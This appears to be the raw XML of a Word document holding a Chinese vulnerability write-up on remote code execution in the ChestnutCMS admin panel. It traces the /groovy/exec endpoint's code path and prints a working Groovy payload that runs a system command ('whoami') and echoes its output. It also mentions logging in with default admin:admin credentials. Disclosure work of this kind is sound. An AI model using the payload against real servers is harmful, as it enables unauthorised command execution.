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CD1DD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑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ChestnutCMS管理后台存在远程代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619DB343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环境搭建：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6AA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官方文档搭建教程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C101F3C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.1000mz.com/docs/quickstart/668421333332037.shtml" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.1000mz.com/docs/quickstart/668421333332037.shtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BCC58D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代码审计：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128798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搭建完成后访问后台，发现在系统工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GroovyScript处存在Groovy脚本执行功能。F12查看是哪个接口，发现为/groovy/exec接口，全局搜索groovy，发现该控制层代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCC82C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3907155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="888945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4547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E2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来到execGroovyScript方法，前两行new了两个Writer对象，来到try语块第一行。调试发现刚刚前端输入的代码传入了loadNewInstance方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5326B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2706370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16069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67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10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跟进loadNewInstance方法，接着来到getCodeSourceClass方法，看方法名猜测是获取Class。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FA9E84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2684145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="168949922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99223" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮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2A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该方法首先根据输入的字符串生成了md5值，避免重复编译相同脚本，从数据库中取对应md5的clazz，如果未取到，也就是clazz==null，就会走到groovyClassLoader.parseClass，这是Groovy的核心方法，把字符串形式的脚本编译成可实例化的JavaClass。最后返回clazz。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288999A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E5ADC17">
      <w:pPr>
        <w:rPr>
          <w:rFonts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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2731770"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10576716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7164" name="图片 1" descr="图形用户界面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7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回到loadNewInstance方法，此时clazz为刚刚传入的脚本类名，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过反射调用默认构造函数生成对象实例。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If条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">确保脚本类继承了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BaseGroovyScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>并强转为BaseGroovyScript类，方便后续run方法调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/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Style w:val="17"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最后将系统服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注入到脚本实例中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并返回。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F35EB">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2433955"/>
            <wp:effectExtent l="0" t="0" r="825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A4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然后回到controller，执行script.run();方法，此时script为BaseGroovyScript类，调用BaseGroovyScript#run()，最后调用我们传入的类的重写run方法，实现远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E6890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601720"/>
            <wp:effectExtent l="0" t="0" r="8890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44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漏洞复现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB4B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1.经过上面的分析，就很清楚payload怎么写了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319D9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2.需要继承BaseGroovyScript类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6AC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3.需要重写run方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA31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需要传入PrintWriter，因为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BaseGroovyScript#run()存在writer参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA64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最终构造出带有命令回显的payload如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD4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import com.chestnut.system.groovy.BaseGroovyScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5DB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import java.io.PrintWriter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D965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356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class MyScript extends BaseGroovyScript {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0C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@Override </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DAA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void run(PrintWriter out) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA1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Process p = new ProcessBuilder("cmd", "/c", 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whoami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").start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCC7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new BufferedReader(new InputStreamReader(p.getInputStream()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DB9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    .lines().forEach(out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55689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589AB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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBD2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来到管理后台http://ip:port/admin，默认用户名密码admin:admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E66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找到GroovyScript功能，输入payload，执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27744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2880" cy="2850515"/>
            <wp:effectExtent l="0" t="0" r="1397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EA1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875155"/>
            <wp:effectExtent l="0" t="0" r="952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25C"/>
    <w:rsid w:val="00080555"/>
    <w:rsid w:val="00232D7D"/>
    <w:rsid w:val="00371219"/>
    <w:rsid w:val="00422260"/>
    <w:rsid w:val="004723B2"/>
    <w:rsid w:val="004C1D3A"/>
    <w:rsid w:val="006B425C"/>
    <w:rsid w:val="007D36D3"/>
    <w:rsid w:val="00893DFE"/>
    <w:rsid w:val="009278F2"/>
    <w:rsid w:val="0093004F"/>
    <w:rsid w:val="009F0CA8"/>
    <w:rsid w:val="00C95310"/>
    <w:rsid w:val="00CF0D92"/>
    <w:rsid w:val="00D2667C"/>
    <w:rsid w:val="307906C7"/>
    <w:rsid w:val="46535859"/>
    <w:rsid w:val="7B82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FollowedHyperlink"/>
    <w:basedOn w:val="14"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="16">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="14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HTML Code"/>
    <w:basedOn w:val="14"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18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4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4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261</Words>
  <Characters>500</Characters>
  <Lines>4</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>94</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>500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2025-09-19T08:13:00Z</dcterms:created>
  <dc:creator>xiao c</dc:creator>
  <cp:lastModifiedBy>Rainbow</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-20T05:04:56Z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eyJoZGlkIjoiOGZhMTkwY2ZkMjQ4OGFmZGNkMDYyYjEyZjMzYzY0NTkiLCJ1c2VySWQiOiIxMjIyMTY4MTk4In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.22529</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>EACEEB4709F444FBAA2D0583AD7B2A05_12</vt:lpwstr>
  </property>
</Properties>
</file>